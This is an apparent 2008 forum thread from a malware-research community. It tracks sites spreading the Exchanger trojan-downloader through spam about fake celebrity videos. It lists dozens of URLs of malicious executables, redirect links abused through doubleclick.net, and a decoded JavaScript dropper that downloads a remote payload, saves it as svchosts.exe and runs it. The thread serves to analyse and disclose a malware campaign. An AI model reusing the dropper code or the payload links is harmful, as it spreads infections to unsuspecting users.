Author Topic: Thread about Exchanger sites  (Read 41898 times)

0 Members and 1 Guest are viewing this topic.

May 28, 2008, 01:24:50 pm
Read 41898 times

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I'll post here the links to sites infected with Trojan-Downloader.Exchanger.xx

I get the links from spam emails. All of the mails are about some video (Britney caught naked etc.)

Code: [Select]
http://thebrits.cl/index.php
>
http://thebrits.cl/pindex.php  < a script, see bellow
http://thebrits.cl/wamkl.gif
http://thebrits.cl/video_new.exe

http://thebrits.cl/pindex.php
>
http://thebrits.cl//load.php   < exe file

May 28, 2008, 06:30:26 pm
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

May 28, 2008, 08:42:42 pm
Reply #2

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
The list of previous Exchanger URLs (recovered from Malzilla's cache):
Code: [Select]
http://www.b-created.be/images/xyt/video_free.exe
http://logistixmedia.com/images/video/video_int.exe
http://rockaina.com/video.exe
http://justleopold.com/video.exe
http://remotes.ch/video.exe
http://www.ufg.asso.fr/video.exe
http://normrestorasyon.com/video.exe
http://www.sural-autoparts.com/video.exe
http://www.bambinidimanina.org/video.exe
http://iberseas.com/video.exe
http://mitoltd.com.tr/video.exe
http://studiogsm.pl/video.exe
http://flet.za.pl/video.exe
http://www.vallejo.onored.com/video.exe
http://www.photokeepsake.co.uk/video.exe
http://abakos.com.es/video.exe
http://simon.lermen.de/video.exe
http://tellover.com/video.exe
http://jungschar-stthekla.at/video.exe
http://beaukaye.com/video.exe
Probably all of them are dead by now.

May 28, 2008, 11:59:44 pm
Reply #3

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

May 29, 2008, 01:13:21 pm
Reply #4

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Code: [Select]
http://www.cronicasdecaracas.com/for_y.php
> http://www.cronicasdecaracas.com/main34.html
>>http://www.cronicasdecaracas.com/pindex.php
>>http://www.cronicasdecaracas.com/untitled.gif
>>http://www.cronicasdecaracas.com/for_you.exe

http://www.cronicasdecaracas.com/pindex.php  <-- fake 404 with JS
>http://www.cronicasdecaracas.com//load.php  <-- payload, exe file

Decoded script:

poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','cl');
var asst = ender.CreateObject('adT','http://www.cronicasdecaracas.com//load.php',false);
asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}}

May 29, 2008, 08:19:36 pm
Reply #5

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Code: [Select]
http://expotech.es/video.exe

May 29, 2008, 10:29:38 pm
Reply #6

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

May 30, 2008, 12:55:09 pm
Reply #7

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
New one.
Code: [Select]
http://ad.doubleclick.net/click;h=nfuit;~sscs=%3fhttp://bottegadelpesto.com/video.exe
This time I gave the link in the form it was in spam mail.
Earlier links in this thread also contained redirections, but through Google.
This one uses new redirection - through doubleclick.net

May 30, 2008, 06:17:58 pm
Reply #8

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

May 31, 2008, 06:49:16 am
Reply #9

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Code: [Select]
http://do-haguenau.com/index1.php
>http://do-haguenau.com/main34.html
>>http://do-haguenau.com/pindex.php  <<-- fake 404, JavaScript
>>http://do-haguenau.com/wamkl.gif
>>http://do-haguenau.com/video_film.exe  <<-- payload

http://do-haguenau.com/pindex.php
>http://do-haguenau.com//load.php  <<-- payload

Same scheme like in one from the previous cases

May 31, 2008, 08:31:28 am
Reply #10

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Code: [Select]
http://www.quinotizie.info/video.exeDoubleclick.net redirection used
Code: [Select]
http://ad.doubleclick.net/click;h=IKgZj;~sscs=%3fhttp://www.quinotizie.info/video.exe

May 31, 2008, 12:12:01 pm
Reply #11

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Code: [Select]
http://www.blumedit.it/video.exeDoubleclick.net redirection is used in spammed link:
Code: [Select]
http://ad.doubleclick.net/click;h=SLrjj;~sscs=%3fhttp://www.blumedit.it/video.exe

May 31, 2008, 07:39:54 pm
Reply #12

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

June 01, 2008, 02:17:18 pm
Reply #13

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
Code: [Select]
http://clubnauticoliva.com/video.exeIt was using redirection through Doubleclick.net
Code: [Select]
http://ad.doubleclick.net/click;h=FMKqg;~sscs=%3fhttp://clubnauticoliva.com/video.exe

June 01, 2008, 09:37:07 pm
Reply #14

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964